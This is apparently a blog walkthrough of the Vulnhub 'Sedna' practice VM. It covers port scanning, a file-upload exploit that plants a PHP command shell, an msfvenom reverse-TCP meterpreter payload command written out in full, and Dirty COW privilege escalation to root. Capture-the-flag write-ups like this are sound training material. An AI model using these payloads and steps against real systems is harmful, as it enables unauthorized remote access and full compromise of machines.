We are on a roll this week! With this slew of new VM’s up on Vulnhub, there is plenty to keep me busy. Today’s episode: Sedna.
Sedna is the “Intermediate” difficulty VM in a progressively more difficult 3 part series. Let’s see if it lives up to the difficulty rating.
As per the norm, I start off by scanning the target machine to see what services we’re working with:
Nmap scan report for 192.168.110.132
Host is up (0.00016s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
| 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_ 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
|_ bind.version: 9.9.5-3-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
Ok, 80 and 8080 stick out as potential first targets, so let’s take a look at what’s on 80:
Similar to Quaoar, we’ve got a picture of a rendered planet and it takes you to a “Hack the planet” picture when it’s clicked on:
As for 8080, it just gives us a Tomcat7 landing page. Nothing too interesting, so let’s run wfuzz to see if we can find some interesting dirs:
No dice. Ok, let’s figure out what’s running on port 80. After some digging through each directory from the wfuzz scan, I find what I’m looking for at http://192.168.110.132/themes/default_theme_2015/description.txt:
A quick search in searchsploit turns up a single lonely exploit:
Next we modify the script to point to our target (After verifying the path exists on the target), place it in /var/www/html, start apache, and navigate to 127.0.0.1. We’re presented with a form upload page. Upload a basic php command shell:
Once it’s sent we’re able to run commands:
I tried a few basic reverse shells to no avail and decide to move to an mfsvenom payload:
root@z00n-kali:~/Documents/vulnhub/sedna/loot# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.110.128 LPORT=53 -f elf >msfshell
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 71 bytes
Final size of elf file: 155 bytes
I upload the payload, use curl to make the file executable, prepare metasploit, and execute the shell:
Navigating to /var/www/ gets us the first flag:
Next up is figuring out the best way to root. I load up metasploits exploit suggester module:
None of these end up working, so I give dirtycow a shot:
It worked! I guess I should start testing dirtycow on everything from now on. That’s a quick win if it’s vuln. I quickly grab the flag, and it’s game over. There are apparently 2 more post-exploitation flags, but the one I’m immediately aware of is a cracking challenge, so I didn’t bother with it.